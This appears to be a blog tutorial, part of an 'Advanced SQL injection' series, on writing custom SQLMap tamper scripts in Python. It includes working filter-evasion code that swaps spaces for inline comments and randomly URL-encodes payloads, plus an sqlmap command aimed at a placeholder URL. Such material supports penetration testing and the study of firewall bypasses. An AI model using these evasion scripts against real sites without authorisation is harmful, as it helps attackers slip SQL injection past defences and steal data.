Open in app

Sign in

Write

Sign in

How to Create Your Own SQLMap Tamper Scripts — Step-by-step guide

nav1n
2 min readJul 26, 2024

--

Creating your own tamper script for SQLMap involves writing a Python script that modifies the payloads used by SQLMap to evade web application firewalls (WAFs) or other filtering mechanisms. Here is a step-by-step guide to create a custom tamper script.

This article is originally posted on: https://nav1n0x.gitbook.io/advanced-sql-injection-techniques by nav1n.

How to Create Your Own SQLMap Tamper Scripts — Step-by-step guide (Image credit: https://www.linkedin.com)

Step 1: Understand the Basics of a Tamper Script

A tamper script modifies the payload sent to the server. The script should contain a function called tamper that takes a payload string as an argument and returns the modified payload string.

Step 2: Structure of a Tamper Script

Here is the basic structure of a tamper script:

#!/usr/bin/env python

import random

__priority__ = 1

def dependencies():
    pass

def tamper(payload):
    # Modify the payload here
    modified_payload = payload
    return modified_payload
  • __priority__: Defines the order in which tamper scripts are applied.
  • dependencies(): Checks for any required dependencies.
  • tamper(payload): The main function that modifies the payload.

Step 3: Implement a Simple Tamper Script

Let’s create a simple tamper script that replaces spaces with comments to evade basic filters.

Example: Space-to-Comment Tamper Script:

#!/usr/bin/env python

import random

__priority__ = 1

def dependencies():
    pass

def tamper(payload):
    """
    Replaces space character (' ') with a random inline comment ('/**/')
    """
    if payload:
        payload = payload.replace(" ", "/**/")
    return payload

Step 4: More Advanced Example

Now, let’s create a more advanced tamper script that randomly URL-encodes characters in the payload.

Example: Random URL Encoding Tamper Script:

#!/usr/bin/env python

import random

__priority__ = 1

def dependencies():
    pass

def tamper(payload):
    """
    Randomly URL encodes characters in the payload
    """
    if payload:
        encoded_payload = ""
        for char in payload:
            if random.randint(0, 1):
                encoded_payload += "%%%02x" % ord(char)
            else:
                encoded_payload += char
        return encoded_payload
    return payload

Step 5: Save and Use the Tamper Script

  1. Save the Script: Save your tamper script in the tamper directory of your SQLMap installation. For example, save it as random_urlencode.py.
  2. Use the Script: Use the --tamper option in SQLMap to apply your custom tamper script.
sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=random_urlencode

Step 6: Testing and Debugging

  • Test: Ensure the script works as intended by running SQLMap with different payloads.
  • Debug: Print debug information if necessary. You can add print statements within the tamper function to debug your script.

Debugging Example:

#!/usr/bin/env python

import random

__priority__ = 1

def dependencies():
    pass

def tamper(payload):
    """
    Randomly URL encodes characters in the payload
    """
    if payload:
        encoded_payload = ""
        for char in payload:
            if random.randint(0, 1):
                encoded_payload += "%%%02x" % ord(char)
            else:
                encoded_payload += char
        print(f"Original: {payload}")
        print(f"Modified: {encoded_payload}")
        return encoded_payload
    return payload

This article is a part of series “Advanced SQL injection” by Nav1n.

--

--

nav1n

Written by nav1n

955 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams